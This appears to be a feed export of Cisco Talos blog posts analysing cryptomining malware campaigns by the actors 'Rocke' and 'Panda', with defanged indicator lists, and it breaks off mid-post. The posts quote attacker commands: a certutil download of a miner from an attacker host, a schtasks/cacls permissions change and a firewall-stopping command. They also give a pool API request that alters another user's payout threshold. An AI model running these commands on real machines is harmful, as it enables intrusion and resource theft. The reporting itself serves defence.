A few examples are below: \n\n\n[](<https://2.bp.blogspot.com/--VxrS9BeGXA/WnG9ydG0RlI/AAAAAAAAAnM/j_rDz4bvK384-fHed56GXcDehQ9P-Dt_QCLcBGAs/s1600/image25.png>)\n\n**Mining Fail Example #1**\n\n[](<https://3.bp.blogspot.com/-w3Y6QyEIEP8/WnG96btX1wI/AAAAAAAAAnU/5jijQ_mBw6Q89KlaCgw506k5Ef2rNwBgwCLcBGAs/s1600/image8.png>)\n\n**Mining Fail Example #2**\n\n[](<https://1.bp.blogspot.com/-lzwj4E9U-0o/WnG-Cc7XTYI/AAAAAAAAAnY/MSP3Pngrk0AtEgq5ceto9lyo6cdNFF9lQCLcBGAs/s1600/image3.png>)\n\n**Mining Fail Example #3**\n\n[](<https://2.bp.blogspot.com/-boqhpLlFsxw/WnG-JhPkK6I/AAAAAAAAAnc/pZdDYcGpxw4B6pFIf6tV65MtkC9f9-7zACLcBGAs/s1600/image1.png>)\n\n**Mining Fail Example #4**\n\n \nThis clearly indicates that many of the attackers leveraging cryptocurrency miners are extensively using code and command line syntax they find online, and in some cases may not actually understand the code they are working with or how cryptocurrency mining even works. As a result, default values and placeholders are not always being updated to enable them to monetize or generate revenue from these sorts of attacks. \n \nAdditionally, while performing our research we found an interesting way that could, in theory, allow one to manipulate the payouts received by the attackers. Currently, within the web interface used by many of the mining pools (and exposed via an API), there is a \"Personal Threshold\" value that is publicly editable. This setting determines how much coin must be mined before the payout will be sent to the attacker's wallet. By setting this value to a large amount (e.g. 50 XMR) the attacker would have to wait an extended period before receiving their next payout. 
While the attacker could just change this value back, it could be changed right back to 50 XMR using a GET request as long as the request is made to the mining pool's URL using the following structure: \n \n\n \n \n \"https://p5[.]minexmr[.]com/set_info?address=$WORKER&type=thold&amount=50000000000000\"\n\n \nWhere $WORKER is the 'Worker ID' that is being modified. This same parameter is available on many of the major mining pool websites that we analyzed. Note that the syntax could be different depending on the pool that is being used by the adversary. \n \n\n\n## Conclusion\n\n \nThe number of ways adversaries are delivering miners to end users is staggering. It is reminiscent of the explosion of ransomware we saw several years ago. This is indicative of a major shift in the types of payloads adversaries are trying to deliver. It helps show that the effectiveness of ransomware as a payload is limited. It will always be effective to ransom specific organizations or to use in targeted attacks, but as a payload to compromise random victims its reach definitely has limits. At some point the pool of potential victims becomes too small to generate the revenue expected. \n \nCrypto miners may well be the new payload of choice for adversaries. It has been and will always be about money and crypto mining is an effective way to generate revenue. It's not going to generate large sums of money for each individual system, but when you group together hundreds or thousands of systems it can be extremely profitable. It's also a more covert threat than ransomware. A user is far less likely to know a malicious miner is installed on the system other than some occasional slow down. This increases the time a system is infected and generating revenue. In many ways its the exact opposite of ransomware. Ransomware is designed to generate revenue in a couple of days from a victim and the payoff is immediate. 
Malicious miners are designed to exist on a system for weeks, months, or ideally years. \n \nIt also introduces a new challenge to enterprises. A decision needs to be made on how to treat things like miners and whether they should be judged exclusively as malware. Each enterprise needs to decide how to handle these threats. The first step is determining how prevalent they are in your environment and then deciding how to handle it going forward. \n \n\n\n## Coverage\n\n \nThere are different ways to address miners and there is detection built in to Cisco security products to detect this activity. There is a specific detection name in AMP for coin miners, W32.BitCoinMiner. However, as these miners can be added as modules to various other threats, the detection names may vary. Additionally there are a couple NGIPS signatures designed to detect mining activity as well. However, these rules may not be enabled by default in your environment depending on the importance of potentially unwanted applications (PUA) in your network. The signatures that detect this type of activity includes, but isn't limited to: 40841-40842, 45417, and 45548-45550. \n \nAlso, technologies like Threat Grid have created indicators to clearly identify when mining activity is present when a sample is submitted. \n \n\n\n## IOC Section\n\n \n\n\n### IP Addresses:\n\n \n89.248.169[.]136 \n128.199.86[.]57 \n\n\n### \n\n### Domains:\n\n \nqyvtls749tio[.]com \nyouronionlink[.]onion \n \n\n\n### [File Hashes](<https://alln-extcloud-storage.cisco.com/ciscoblogs/5a71e1c64654d.txt>)\n\n \n\n\n[](<http://feeds.feedburner.com/~ff/feedburner/Talos?a=nyH5a-BdwkQ:qkNEPRJJDb0:yIl2AUoC8zA>)\n\n", "modified": "2018-01-31T16:34:16", "published": "2018-01-31T07:58:00", "id": "TALOSBLOG:A6B70436696A7578F1EF6B7090D11B59", "href": "http://feedproxy.google.com/~r/feedburner/Talos/~3/nyH5a-BdwkQ/malicious-xmr-mining.html", "type": "talosblog", "title": "Ransom Where? 
Malicious Cryptocurrency Miners Takeover, Generating Millions", "cvss": {"score": 5.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:NONE/"}}, {"lastseen": "2018-08-31T19:09:28", "bulletinFamily": "blog", "cvelist": ["CVE-2017-10271", "CVE-2017-3066"], "description": "_This post was authored by [David Liebenberg](<https://twitter.com/chinahanddave>). _\n\n \n \n\n\n## Summary\n\n \nCryptocurrency miners are becoming an increasingly significant part of the threat landscape. These malicious miners steal CPU cycles from compromised devices to mine cryptocurrencies and bring in income for the threat actor. \n \nIn this post, we look at the activity of one particular threat actor: Rocke. We will examine several of Rocke's campaigns, malware, and infrastructure while uncovering more information about the actor. After months of research, we believe that Rocke is an actor that must be followed, as they continue to add new features to their malware and are actively exploring new attack vectors. \n \n\n\n## Introduction\n\n \nTalos has written widely about the issue of [cryptomining malware](<https://blog.talosintelligence.com/2018/01/malicious-xmr-mining.html&sa=D&ust=1535643040325000>) and how organizations should [protect systems](<https://blog.talosintelligence.com/2018/07/blocking-cryptomining.html&sa=D&ust=1535643040326000>) against this threat. We continue to actively research developments in this threat through research that includes monitoring criminal forums and deploying honeypot systems to attract these threats. It is through these intelligence sources that the Chinese-speaking actor which we refer to as \"Rocke\" came to our attention. \n \nRocke actively engages in distributing and executing cyrptomining malware using a varied toolkit that includes Git repositories, HttpFileServers (HFS), and a myriad of different payloads, including shell scripts, JavaScript backdoors, as well as ELF and PE miners. 
\n \n\n\n## Early campaigns\n\n \nThis threat actor initially came to our attention in April 2018, leveraging both Western and Chinese Git repositories to deliver malware to honeypot systems vulnerable to an Apache Struts vulnerability. \n \nSeveral files were downloaded to our Struts2 honeypot from the Chinese repository site gitee.com for a user named \"c-999.\" Subsequently, the Gitee user page transitioned to \"c-888.\" Around the same time, we observed similar activity pulling down files from a gitlab.com repository page for a user named \"c-18.\" \n \nThe repositories on both Gitee and GitLab were identical. All the repositories had a folder called \"ss\" that contained 16 files. The files were a collection of ELF executables, shell scripts, and text files that execute a variety of actions, including achieving persistence and the execution of an illicit cryptocurrency miner. \n \nOnce the threat actor had compromised a system, they achieved persistence on the device by installing a cron job that downloads and executes a file \"logo.jpg\" from \"3389[.]space.\" This file is a shell script which, in turn, downloads mining executables from the threat actor's Git repositories and saves them under the filename \"java.\" The exact file downloaded depends on the victim's system architecture. Similarly, the system architecture determines if \"h32\" or \"h64\" is used to invoke \"java.\" \n \nAlthough we first observed this actor exploiting vulnerabilities in Apache Struts, we've also observed what we believe to the same individual exploiting an Oracle WebLogic server vulnerability (CVE-2017-10271), and also exploiting CVE-2017-3066, a critical Java deserialization vulnerability in the Adobe ColdFusion platform. \n \n\n\n## Recent campaign\n\n \nIn late July, we became aware that the same actor was engaged in another similar campaign. Through our investigation into this new campaign, we were able to uncover more details about the actor. 
\n \nWe observed a wget request from our Struts2 honeypot for a file named \"0720.bin\" located on 118[.]24[.]150[.]172:10555. We visited this IP and found it was an open HFS hosting \"0720.bin\" along with 10 additional files: \"3307.bin,\" \"a7,\" \"bashf,\" \"bashg,\" \"config.json,\" \"lowerv2.sh,\" \"pools.txt,\" \"r88.sh,\" \"rootv2.sh\" and \"TermsHost.exe.\" We set about examining these files. \n \n \n[](<https://3.bp.blogspot.com/-Wv1QkpgsIM0/W4gFUMGqKFI/AAAAAAAAAx4/evI36ADu_wE3nWnR38WNm6I2gitFSIngwCLcBGAs/s1600/image5.png>) \n--- \nScreenshot of HFS system \n \n \n \n \nWe had previously observed this same IP scanning for TCP port 7001 throughout May 2018. This was potentially a scan for Oracle WebLogic servers, which listens on TCP port 7001 by default. \n \nBoth \"0720.bin\" and \"3307.bin\" are similar ELF files of similar size (84.19KB) that reach out to 118[.]24[.]150[.]172, and were marked clean in VirusTotal at the time of discovery. Morpheus Labs described a similar file that connects to the same IP address, which could open a shell on the victim's machine if a password-verified instruction was issued from the C2. In both our samples, as well as the ones that [Morpheus Labs](<https://morphuslabs.com/criminals-dont-read-instructions-or-use-strong-passwords-a09439617867&sa=D&ust=1535643040331000>) described, the hard-coded password was not only identical, but also located at the same offset. \n \n[](<https://3.bp.blogspot.com/-gkkEgex3fQE/W4gFfUPyS7I/AAAAAAAAAx8/FIip4n1BydgCUlwQQoEJKmNlfvJ3ShivQCLcBGAs/s1600/image3.png>) \n--- \nHard-coded password \n \n \n \n\"A7\" is a shell script that kills a variety of processes related to other cryptomining malware (including those with names matching popular mining malware such as \"cranberry,\" \"yam,\" or \"kworker\"), as well as mining in general (such as \"minerd\" and \"cryptonight\"). 
It detects and uninstalls various Chinese AV, and also downloads and extracts a tar.gz file from blog[.]sydwzl[.]cn, which also resolves to 118[.]24[.]150[.]172. The script downloads a file from GitHub called [\"libprocesshider,\"](<https://github.com/gianlucaborello/libprocesshider&sa=D&ust=1535643040332000>) which hides a file called \"x7\" using the ID preloader. The script looks for IP addresses in known_hosts and attempts to SSH into them, before downloading \"a7\" again from the actor's HFS at 118[.]24[.]150[.]172, and execute it. \n \n[](<https://3.bp.blogspot.com/-kHdZB-4kmko/W4gF3DsxTGI/AAAAAAAAAyE/hYEz3KrdFgIkb7EvjWOa_-K-iwZvnGmzACLcBGAs/s1600/image4.png>) \n--- \nExtract of Source Code of \"a7\" \n \n \n \n \n\"Config.json\" is a mining config file for XMRig, an open-source Monero miner. The file sets the mining pool as xmr[.]pool[.]MinerGate[.]com:45700 and the actor's wallet as rocke@live.cn. This is why we have named the actor \"Rocke\" (note that for MinerGate, an email can be used in place of a Monero wallet number \u2014 it's simply the login email for the MinerGate platform). \"Pools.txt\" appears to be a config file for XMR-stak, an open-source universal Stratum pool miner that mines Monero, Aeon and more. This configuration file contains the same actor pool and wallet information as the first. \n \n\"Bashf\" is a variant of XMR-stak while \"bashg\" is a variant of XMRig. \n \n \n \n\"Lowerv2.sh\" and \"rootv2.sh\" are similar shell scripts that attempt to download and execute the mining malware components \"bashf\" and \"bashg,\" hosted on 118[.]24[.]150[.]172. If the shell scripts do not download a miner from 118[.]24[.]150[.]172, they attempt to download a file called \"XbashY\" from 3g2upl4pq6kufc4m[.]tk. \n \n\"R88.sh\" is a shell script that installs a cron job and attempts to download \"lowerv2.sh\" or \"rootv2.sh.\" \n \n\"TermsHost.exe\" is a PE32 Monero miner. 
Based on the config file it uses, it appears to be the [Monero Silent Miner](<https://xmrminer.net/faq.php&sa=D&ust=1535643040335000>). This miner can be purchased online for $14 and targets malicious actors. Advertising for the miner promotes it as offering startup registry key persistence, mining only while idle, and the ability to inject the miner into \"Windows processes to bypass firewalls.\" The sample grabs the config file \"xmr.txt,\" which contains the same configuration information as the previous files, from Rocke's command and control (C2) server hosted on sydwzl[.]cn. The sample then injects code into notepad.exe, which then proceeds to communicate with the MinerGate pool. The sample also creates the UPX-packed file \"dDNLQrsBUE.url\" in the Windows Start Menu Folder. Intriguingly, this file appears to share some similarities with Cobalt Strike, the popular penetration testing software, which would allow the attacker to have greater control over the infected system. \n \nThe payload appears to be similar to one used by the Iron Cybercrime Group, as [reported](<https://www.intezer.com/iron-cybercrime-group-under-the-scope-2/>) by cybersecurity firm Intezer in May. Both Iron and Rocke's malware behave similarly, and reach out to similar infrastructure. So, while we can asses with high confidence that the payloads share some code base, we are still unsure of the exact relationship between Rocke and Iron Cybercrime Group. \n \n\n\n## The actor\n\n \nThrough Rocke's MinerGate Monero wallet email [rocke@live.cn](<mailto:rocke@live.cn>), we were able to uncover additional information about the actor. We noticed that Rocke's C2 was registered to the address jxci@vip.qq.com. We then found a[ leak](<http://www.moonsec.com/post-467.html&sa=D&ust=1535643040337000>) of user information from the Chinese security site FreeBuf that showed that a user named \"rocke\" was associated with the email [jxci@vip.qq.com](<mailto:jxci@vip.qq.com>). 
This suggested that they were one and the same. [4] \n \nRocke has been observed seeking access to cloud storage services, as well as obtaining manuals for programming in the Chinese Easy language. \n \nThe majority of websites registered to Rocke list Jiangxi Province addresses for their registration. Some of these websites were for Jiangxi-based businesses, such as belesu[.]com, which sells baby food. We had additional indications that Rocke is from Jiangxi based on their GitHub (see below).
\n \nThe files within their various repositories show that Rocke has become interested in browser-based JavaScript mining through the tool CryptoNote, as well as browser-based exploitation through the Browser Exploitation Framework. It appears that they are relying on fake Google Chrome alerts, fake apps, and fake Adobe Flash updates to social engineer users into downloading malicious payloads. \n \n\n\n[](<https://3.bp.blogspot.com/-RfGQEzxzT8U/W4gGOJCNnWI/AAAAAAAAAyQ/9LUooe3vkT4oisVEs5G9zakzcxEqLdirQCLcBGAs/s1600/image6.png>)\n\n \n \n\n\n[](<https://4.bp.blogspot.com/--PZgS5QMD4c/W4gGVIWDJxI/AAAAAAAAAyY/5HcEvufCv5UrUxV5E-F9btlI7knaiWH1QCLcBGAs/s1600/image1.png>)\n\n \n \nOne of the JavaScript files in the repository, named \"command.js,\" uses hidden IFrames to deliver payloads hosted on CloudFront domains. The payload that we were able to obtain was UPX packed and behaved very similarly to the file \"dDNLQrsBUE.url\" dropped by \"TermsHost.exe.\" \n \nRocke has also shown interest in other security-related repositories. They have forked repositories with exploit information, including those related to Apache Struts 2, JBoss and Shadow Brokers, as well as more general-use tools such as masscan, proxy tools and brute forcers. \n \n\n\n## Conclusion\n\n \nBased on their activity in the past few months, Talos assesses with high confidence that Rocke will continue to leverage Git repositories to download and execute illicit mining onto victim machines. It is interesting to note that they are expanding their toolset to include browser-based miners, difficult-to-detect trojans, and the Cobalt Strike malware. Besides noisy scan-and-exploit activity, it appears that Rocke is likely also pursuing social engineering as a new infection vector, as demonstrated by the repositories involving fake Adobe Flash and Google Chrome updates. 
\n \nDespite the volatility in the value of various cryptocurrencies, the trend of illicit cryptocurrency mining activity among cybercriminals shows no signs of abating. Rocke's various campaigns show the variety of infection vectors, malware, and infrastructure that these criminals will employ to achieve their goals. \n \n\n\n## IOCs:\n\n \n \n\n\n### Earlier campaign:\n\n \n \n\n\n#### Attacking IPs targeting Struts:\n\n \n \n52[.]167[.]219[.]168: Attacking IP using repo at gitlab \n120[.]55[.]226[.]24: Attacking IP using repo at gitee \n \n\n\n#### Attacking IP targeting WebLogic:\n\n \n \n27[.]193[.]180[.]224 \n \n\n\n#### Attacking IPs targeting ColdFusion:\n\n \n \n112[.]226[.]250[.]77 \n27[.]210[.]170[.]197 \n112[.]226[.]74[.]162 \n \n\n\n#### Domains\n\n \n3389[.]space \n \n\n\n#### URLs\n\n \nhxxps://gitee[.]com/c-999/ss/raw/master/ss/a \nhxxps://gitee[.]com/c-999/ss/raw/master/ss/config[.]json \nhxxps://gitee[.]com/c-999/ss/raw/master/ss/dir[.]dir \nhxxps://gitee[.]com/c-999/ss/raw/master/ss/h32 \nhxxps://gitee[.]com/c-999/ss/raw/master/ss/upd \nhxxps://gitee[.]com/c-999/ss/raw/master/ss/x86_64 \nhxxps://gitee[.]com/c-999/ss/raw/master/ss/h64 \nhxxps://gitee[.]com/c-999/ss/raw/master/ss/x \nhxxps://gitee[.]com/c-999/ss/raw/master/ss/run \nhxxps://gitee[.]com/c-999/ss/raw/master/ss/logo[.]jpg \nhxxps://gitee[.]com/c-888/ss/raw/master/ss/a \nhxxps://gitee[.]com/c-888/ss/raw/master/ss/cron[.]d \nhxxps://gitee[.]com/c-888/ss/raw/master/ss/dir[.]dir \nhxxps://gitlab[.]com/c-18/ss/raw/master/ss/x \nhxxps://gitlab[.]com/c-18/ss/raw/master/ss/x86_64 \nhxxps://gitlab[.]com/c-18/ss/raw/master/ss/run \nhxxps://gitee[.]com/c-888/ss/raw/master/ss/upd \nhxxps://gitlab[.]com/c-18/ss/raw/master/ss/upd \nhxxps://gitee[.]com/c-888/ss/raw/master/ss/x \nhxxps://gitlab[.]com/c-18/ss/raw/master/ss/cron[.]d \nhxxps://gitee[.]com/c-888/ss/raw/master/ss/h64 \nhxxps://gitlab[.]com/c-18/ss/raw/master/ss/a \nhxxps://gitee[.]com/c-888/ss/raw/master/ss/config[.]json 
\nhxxps://gitlab[.]com/c-18/ss/raw/master/ss/config[.]json \nhxxps://gitee[.]com/c-888/ss/raw/master/ss/run \nhxxps://gitlab[.]com/c-18/ss/raw/master/ss/h32 \nhxxps://gitlab[.]com/c-18/ss/raw/master/ss/dir[.]dir \nhxxps://gitee[.]com/c-888/ss/raw/master/ss/x86_64 \nhxxps://gitee[.]com/c-888/ss/raw/master/ss/h32 \nhxxps://gitlab[.]com/c-18/ss/raw/master/ss/h64 \nhxxp://93[.]174[.]93[.]149/[.]xxxzlol[.]tar[.]gz \nhxxps://gitee[.]com/c-888/ss/raw/master/ss/logo[.]jpg \nhxxps://gitlab[.]com/c-18/ss/raw/master/ss/logo[.]jpg \n \n\n\n#### Hashes:\n\n \nLogo.jpg: ad68ab153623472bbd8220fb19c488ae2884d9b52bc65add5d54b1821b4b743a \na: 6ec8201ef8652f7a9833e216b5ece7ebbf70380ebd367e3385b1c0d4a43972fb \ncron.d: f6a150acfa6ec9d73fdecae27069026ecf2d833eac89976289d6fa15713a84fe \ndir.dir: a20d61c3d4e45413b001340afb4f98533d73e80f3b47daec42435789d12e4027 \nh32: 45ed59d5b27d22567d91a65623d3b7f11726f55b497c383bc2d8d330e5e17161 \nh64: 7fe9d6d8b9390020862ca7dc9e69c1e2b676db5898e4bfad51d66250e9af3eaf \n \nlogo.jpg (from gitee[.]com): f1f041c61e3086da8157745ee01c280a8238a379ca5b4cdbb25c5b746e490a9b \n \nlogo.jpg (from gitlab[.]com): ad68ab153623472bbd8220fb19c488ae2884d9b52bc65add5d54b1821b4b743a \n \nrun: 0c358d826c4a32a8c48ce88eb073f505b555fc62bca6015f5270425c58a0d1c5 \nupd: 187d06f1e6020b6787264e2e700c46c463a7818f07db0b051687f3cba65dbe0b \nx (32-bit miner): 6e80a9d843faf27e239b1a767d29c7443972be1ddf5ff5f5f9fc9a2b55a161f5 \nx86_64 (64-bit miner): 2ad07f8d1985f00cd05dafacbe5b6a5b1e87a78f8ae8ecdf91c776651c88a612 \n \n\n\n### More recent campaign:\n\n \n \n\n\n#### IPs\n\n \n123[.]249[.]9[.]149: Issues get request for 0720.bin \n118[.]24[.]150[.]172: Rocke's HFS, also resolves to C2 sydwzl[.]cn \n \n\n\n#### Domains:\n\n \nsydwzl[.]cn \nblockbitcoin[.]com: Reached out to by Install.exe \ndazqc4f140wtl[.]cloudfront[.]net: file server \n3g2upl4pq6kufc4m[.]tk: file server \nd3goboxon32grk2l[.]tk: file server \nenjoytopic[.]tk: file server \nrealtimenews[.]tk: file server \n8282[.]space: older 
C2 \n \n\n\n#### Domains registered to Rocke (not all are necessarily malicious):\n\n \n \n5-xun[.]com \n88180585[.]com \nfirstomato[.]com \njxtiewei[.]com \nncyypx[.]net \n \n\n\n#### URLs\n\n \nhxxp://d20blzxlz9ydha[.]cloudfront[.]net/Install.exe \nhxxp://www[.]amazon[.]com:80/N4215/adj/amzn.us.sr.aps?sz=160x600&oe=oe=ISO-8859-1;&sn=12275&s=3717&dc_ref=http%3A%2F%2Fwww.amazon.com \nhxxp://www[.]amazon[.]com:80/s/ref=nb_sb_noss_1/167-3294888-0262949/field-keywords=books \n \n\n\n#### Hashes\n\n \n55dbdb84c40d9dc8c5aaf83226ca00a3395292cc8f884bdc523a44c2fd431c7b 0720.bin \n38066751cb6c39691904ffbef86fe3bdfa737e4ba64add4dd90358245fa2b775 3307.bin \n89b3463664ff13ea77256094844c9cf69d3e408d3daf9ffad3aa18af39bab410 TermsHost.exe \nd341e3a9133e534ca35d5ccc54b8a79f93ff0c917790e7d5f73fedaa480a6b93 a7 \n442e4a8d35f9de21d5cbd9a695a24b9ac8120e548119c7f9f881ee16ad3761e6 bashf \n7674e0b69d848e0b9ff8b82df8671f9889f33ab1a664f299bcce13744e08954c bashg \n7051c9af966d1c55a4096e2af2e6670d4fc75e00b2b396921a79549fb16d03d4 lowerv2.sh \n2f5bf7f1ea7a84828aa70f1140774f3d4ce9985d05a676c8535420232e2af87e pools.txt \nba29d8a259d33d483833387fad9c7231fbb3beb9f4e0603b204523607c622a03 config.json \n7c2dbc0d74e01a5e7c13b4a41d3a1f7564c165bd532e4473acea6f46405d0889 r88.sh \nd44e767132d68fdb07c23c848ff8c28efe19d1b7c070161b7bd6c0ccfc858750 rootv2.sh \n35cb971daafd368b71ad843a4e0b81c80225ec20d7679cfbf78e628ebcada542 Install.exe \n654ec27ea99c44edc03f1f3971d2a898b9f1441de156832d1507590a47b41190 ZZYO \nF808A42B10CF55603389945A549CE45EDC6A04562196D14F7489AF04688F12BC XbashY \n725efd0f5310763bc5375e7b72dbb2e883ad90ec32d6177c578a1c04c1b62054 reg9.sct \nd7fbd2a4db44d86b4cf5fa4202203dacfefd6ffca6a0615dca5bc2a200ad56b6 m.png \nece3cfdb75aaabc570bf38af6f4653f73101c1641ce78a4bb146e62d9ac0cd50 hidden executable in m.png \n \n \n", "modified": "2018-08-31T17:22:22", "published": "2018-08-30T08:26:00", "id": "TALOSBLOG:7B703A19FAC4E490CFFB2AE43C1606DF", "href": 
"http://feedproxy.google.com/~r/feedburner/Talos/~3/e2oaIaRaI6k/rocke-champion-of-monero-miners.html", "type": "talosblog", "title": "Rocke: The Champion of Monero Miners", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2019-09-17T15:28:34", "bulletinFamily": "blog", "cvelist": ["CVE-2017-10271", "CVE-2017-5638", "CVE-2019-2725"], "description": "_By [Christopher Evans](<https://twitter.com/ccevans002>) and [David Liebenberg](<https://twitter.com/ChinaHandDave>)._ \n\n\n## \n\n\n## Executive summary\n\nA new threat actor named \"Panda\" has generated thousands of dollars worth of the Monero cryptocurrency through the use of remote access tools (RATs) and illicit cryptocurrency-mining malware. This is far from the most sophisticated actor we've ever seen, but it still has been one of the most active attackers we've seen in Cisco Talos threat trap data. Panda's willingness to persistently exploit vulnerable web applications worldwide, their tools allowing them to traverse throughout networks, and their use of RATs, means that organizations worldwide are at risk of having their system resources misused for mining purposes or worse, such as exfiltration of valuable information. \n \nPanda has shown time and again they will update their infrastructure and exploits on the fly as security researchers publicize indicators of compromises and proof of concepts. Our threat traps show that Panda uses exploits previously used by Shadow Brokers \u2014 a group infamous for publishing information from the National Security Agency \u2014 and Mimikatz, an open-source credential-dumping program. \n \nTalos first became aware of Panda in the summer of 2018, when they were engaging in the successful and widespread \"MassMiner\" campaign. Shortly thereafter, we linked Panda to another widespread illicit mining campaign with a different set of command and control (C2) servers. 
Since then, this actor has updated its infrastructure, exploits and payloads. We believe Panda is a legitimate threat capable of spreading cryptocurrency miners that can use up valuable computing resources and slow down networks and systems. Talos confirmed that organizations in the banking, healthcare, transportation, telecommunications, IT services industries were affected in these campaigns. \n \n\n\n[](<https://1.bp.blogspot.com/-lf0T3p1bzKg/XYDfgN1h6mI/AAAAAAAAB7o/HvFMxzb8QhQbUO85JND7yrZfjwu7xAfTACLcBGAsYHQ/s1600/image4.png>)\n\n## \n\n\n## First sightings of the not-so-elusive Panda\n\nWe first observed this actor in July of 2018 exploiting a WebLogic vulnerability ([CVE-2017-10271](<https://nvd.nist.gov/vuln/detail/CVE-2017-10271>)) to drop a miner that was associated with a campaign called \"[MassMiner](<https://www.alienvault.com/blogs/labs-research/massminer-malware-targeting-web-servers>)\" through the wallet, infrastructure, and post-exploit PowerShell commands used. \n \nPanda used massscan to look for a variety of different vulnerable servers and then exploited several different vulnerabilities, including the aforementioned Oracle bug and a remote code execution vulnerability in Apache Struts 2 ([CVE-2017-5638](<https://blog.talosintelligence.com/2017/03/apache-0-day-exploited.html>)). They used PowerShell post-exploit to download a miner payload called \"downloader.exe,\" saving it in the TEMP folder under a simple number filename such as \"13.exe\" and executing it. The sample attempts to download a config file from list[.]idc3389[.]top over port 57890, as well as kingminer[.]club. The config file specifies the Monero wallet to be used as well as the mining pool. In all, we estimate that Panda has amassed an amount of Monero that is currently valued at roughly $100,000. 
\n\n\n[](<https://1.bp.blogspot.com/-7Ed1781BBr4/XYDfrwNRtKI/AAAAAAAAB7s/nxr6w2FndDcpsmMKiH8a45uPRZmxCy3FgCLcBGAsYHQ/s1600/image6.png>)\n\n \nBy October 2018, the config file on list[.]idc3389[.]top, which was then an instance of an HttpFileServer (HFS), had been downloaded more than 300,000 times. \n\n\n[](<https://1.bp.blogspot.com/-fpXoN_jw0UU/XYDfx_msBlI/AAAAAAAAB70/SEJLWIIEjUI0rt_HBXROjCsy3KH2RXUrACLcBGAsYHQ/s1600/image5.png>)\n\nThe sample also installs Gh0st RAT, which communicates with the domain rat[.]kingminer[.]club. In several samples, we also observed Panda dropping other hacking tools and exploits. This includes the credential-theft tool Mimikatz and UPX-packed artifacts related to the Equation Group set of exploits. The samples also appear to scan for open SMB ports by reaching out over port 445 to IP addresses in the 172.105.X.X block. \n \nOne of Panda's C2 domains, idc3389[.]top, was registered to a Chinese-speaking actor, who went by the name \"Panda.\" \n \n\n\n## Bulehero connection\n\nAround the same time that we first observed these initial Panda attacks, we observed very similar TTPs in an attack using another C2 domain: bulehero[.]in. The actors used PowerShell to download a file called \"download.exe\" from b[.]bulehero[.]in, and similarly, save it as another simple number filename such as \"13.exe\" and execute it. The file server turned out to be an instance of HFS hosting four malicious files. \n\n\n[](<https://1.bp.blogspot.com/-GbyctYMnyRo/XYDgCR5tbSI/AAAAAAAAB78/3xs1gHqsMD8svymJLjA81TtAbCC4XsTZwCLcBGAsYHQ/s1600/image8.png>)\n\n \nRunning the sample in our sandboxes, we observed several elements that connect it to the earlier MassMiner campaign. First, it issues a GET request for a file called cfg.ini hosted on a different subdomain of bulehero[.]in, c[.]bulehero[.]in, over the previously observed port 57890. 
Consistent with MassMiner, the config file specifies the site from which the original sample came, as well as the wallet and mining pool to be used for mining. \n \nAdditionally, the sample attempts to shut down the victim's firewall with commands such as \"cmd /c net stop MpsSvc\". The malware also modifies the access control list to grant full access to certain files through running cacsl.exe. \n \nFor example: \n\n\n> cmd /c schtasks /create /sc minute /mo 1 /tn \"Netframework\" /ru system /tr \"cmd /c echo Y|cacls C:\\Windows\\appveif.exe /p everyone:F\n\nBoth of these behaviors have also been observed in previous MassMiner infections. \n \nThe malware also issues a GET request to Chinese-language IP geolocation service ip138[.]com for a resource named ic.asp which provides the machine's IP address and location in Chinese. This behavior was also observed in the MassMiner campaign. \n \nAdditionally, appveif.exe creates a number of files in the system directory. Many of these files were determined to be malicious by multiple AV engines and appear to match the exploits of vulnerabilities targeted in the MassMiner campaign. For instance, several artifacts were detected as being related to the \"Shadow Brokers\" exploits and were installed in a suspiciously named directory: \"\\Windows\\InfusedAppe\\Eternalblue139\\specials\\\". \n \n\n\n## Evolution of Panda\n\nIn January of 2019, Talos analysts observed Panda exploiting a recently disclosed vulnerability in the ThinkPHP web framework (CNVD-2018-24942) in order to spread similar malware. ThinkPHP is an open-source web framework popular in China. \n \nPanda used this vulnerability to both directly download a file called \"download.exe\" from a46[.]bulehero[.]in and upload a simple PHP web shell to the path \"/public/hydra.php\", which is subsequently used to invoke PowerShell to download the same executable file. 
The web shell provides only the ability to invoke arbitrary system commands through URL parameters in an HTTP request to \"/public/hydra.php\". Download.exe would download the illicit miner payload and also engages in SMB scanning, evidence of Panda's attempt to move laterally within compromised organizations. \n \nIn March 2019, we observed the actor leveraging new infrastructure, including various subdomains of the domain hognoob[.]se. At the time, the domain hosting the initial payload, fid[.]hognoob[.]se, resolved to the IP address 195[.]128[.]126[.]241, which was also associated with several subdomains of bulehero[.]in. \n \nAt the time, the actor's tactics, techniques, and procedures (TTPs) remained similar to those used before. Post-exploit, Panda invokes PowerShell to download an executable called \"download.exe\" from the URL hxxp://fid[.]hognoob[.]se/download.exe and save it in the Temp folder, although Panda now saved it under a high-entropy filename i.e. 'C:/Windows/temp/autzipmfvidixxr7407.exe'. This file then downloads a Monero mining trojan named \"wercplshost.exe\" from fid[.]hognoob[.]se as well as a configuration file called \"cfg.ini\" from uio[.]hognoob[.]se, which provides configuration details for the miner. \n\n\n[](<https://1.bp.blogspot.com/-6B6MTCm_3U8/XYDgMB6l-xI/AAAAAAAAB8A/g3ux2o0d2KgGC-H6Sy9BiLx4KUTSo8LwQCLcBGAsYHQ/s1600/image7.png>)\n\n \n\"Wercplshost.exe\" contains exploit modules designed for lateral movement, many of which are related to the \"Shadow Brokers\" exploits, and engages in SMB brute-forcing. The sample acquires the victim's internal IP and reaches out to Chinese-language IP geolocation site 2019[.]ip138[.]com to get the external IP, using the victim's Class B address as a basis for port scanning. It also uses the open-source tool Mimikatz to collect victim passwords. \n \nSoon thereafter, Panda began leveraging an updated payload. 
Some of the new features of the payload include using Certutil to download the secondary miner payload through the command: \"certutil.exe -urlcache -split -f http://fid[.]hognoob[.]se/upnpprhost.exe C:\\Windows\\Temp\\upnpprhost.exe\". The coinminer is also run using the command \"cmd /c ping 127.0.0.1 -n 5 & Start C:\\Windows\\ugrpkute\\\\[filename].exe\". \n \nThe updated payload still includes exploit modules designed for lateral movement, many of which are related to the \"Shadow Brokers\" exploits. One departure, however, is previously observed samples acquire the victim's internal IP and reach out to Chinese-language IP geolocation site 2019[.]ip138[.]com to get the external IP, using the victim's Class B address as a basis for port scanning. This sample installs WinPcap and open-source tool Masscan and scans for open ports on public IP addresses saving the results to \"Scant.txt\" (note the typo). The sample also writes a list of hardcoded IP ranges to \"ip.txt\" and passes it to Masscan to scan for port 445 and saves the results to \"results.txt.\" 